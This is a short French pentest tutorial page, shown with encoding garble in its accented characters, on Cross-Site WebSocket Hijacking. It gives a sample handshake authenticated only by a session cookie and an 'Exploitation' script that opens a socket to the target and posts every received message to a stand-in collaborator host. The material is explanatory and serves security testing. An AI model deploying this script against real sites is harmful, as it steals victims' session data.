๐Ÿš€Cross-site WebSocket Hijacking (CSWSH)

Lโ€™attaque Cross-Site WebSocket Hijacking est possible quand le WebSocket Handshake est vulnรฉrable au CSRF. En effet, le canal de communication entre les deux parties (client/serveur) se crรฉe en fonction de lโ€™origine de la demande dโ€™ouverture. Ainsi, si la demande de changement de protocole ne se base que sur les cookies, un attaquant peut alors piรฉger une victime afin quโ€™elle initie une demande avec sa session mais sur le serveur de lโ€™attaquant.

Exemple

GET /chat HTTP/1.1
Host: normal-website.com
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w==
Connection: keep-alive, Upgrade
Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
Upgrade: websocket

Dans cette requรชte, on voit que le seul รฉlรฉment permettant d'รฉtablir une session entre le client et le serveur est le cookie "session" laissant penser qu'il est fortement probable qu'il n'existe pas de protection contre les CSWSH.

Exploitation

<script>
    var ws = new WebSocket('wss://target.com/endpoint');
    ws.onopen = function() {
        ws.send("<start message>");
    };
    ws.onmessage = function(event) {
        fetch('https://your-burp.collab.com', {method: 'POST', mode: 'no-cors', body: event.data});
    };
</script>

Derniรจre mise ร  jour